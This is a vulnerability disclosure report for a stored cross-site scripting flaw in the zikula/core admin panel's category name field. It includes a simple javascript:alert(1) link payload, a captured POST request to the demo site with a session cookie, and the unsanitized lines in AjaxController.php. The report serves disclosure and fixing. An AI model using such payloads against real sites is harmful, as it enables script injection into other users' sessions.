Cross-site Scripting (XSS) - Stored in zikula/core
Reported on
Dec 30th 2021
Description
When inputting a name for a module category (whether editing an existing one or adding a new one), you're able to inject your own Javascript, leading to it being executed.
An example payload that you can enter is: <a href="javascript:alert(1)">xss</a> and then each time that you click the category to expand it, your Javascript payload is executed:
Proof of Concept
<a href="javascript:alert(1)">xss</a>
Request:
POST /adminpanel/ajax/editcategory HTTP/1.1
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 13
Origin: https://demo.ziku.la
DNT: 1
Connection: keep-alive
Referer: https://demo.ziku.la/adminpanel/panel/1
Cookie: _zsid=78cujs3anllt6em953aut59odj
Sec-GPC: 1
Impact
An attacker can exploit this vulnerability in order to execute their own Javascript on the admin panel.
Occurrences
AjaxController.php L256
The item variable stores the category object. The name of the category is updated using the new category name, which is stored in the variable name and was retrieved from the user's request (the user's request data is stored in variables at line 210-211, the name variable stores the new category name) without proper sanitization.
The item variable (line 255) stores the category object. The name of the category is updated using the name variable which is used without being properly sanitized, it should be sanitized prior to line 255. The name variable stores the category name which the user supplies in their request (see lines 210-211 which is where the user's request data when updating a category name are stored into variables)
